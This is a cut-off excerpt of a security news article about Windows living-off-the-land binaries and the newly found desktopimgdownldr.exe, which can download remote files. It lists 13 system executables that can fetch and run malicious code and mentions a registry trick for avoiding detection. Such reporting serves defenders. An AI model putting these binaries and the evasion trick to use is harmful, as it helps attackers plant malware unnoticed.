A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.
Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.
The new LoL in the Bin
An attacker can use LoLBins to download and install malware, bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.
A report from Cisco Talos last year provides a list of 13 Windows native executables that can download and execute malicious code:
powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe
Researchers from SentinelOne discovered that "desktopimgdownldr.exe," located in Windows 10's system32 folder, can also serve as a LoLBin.
The executable is part of the Personalization CSP (configuration service provider) that allows, among others, defining the lock screen and desktop background images.
In both cases, the setting accepts JPG, JPEG, PNG files that are stored locally or remotely (supports HTTP/S URLs).
Simple tricks
SentinelOne's Gal Kristal says that running desktopimgdownldr.exe with administrator privileges overrules the user-defined lock screen image, alerting of something suspicious.
This can be avoided, though, if the attacker deletes a registry value immediately after running executing the binary, leavi ..
Support the originator by clicking the read the rest link below.
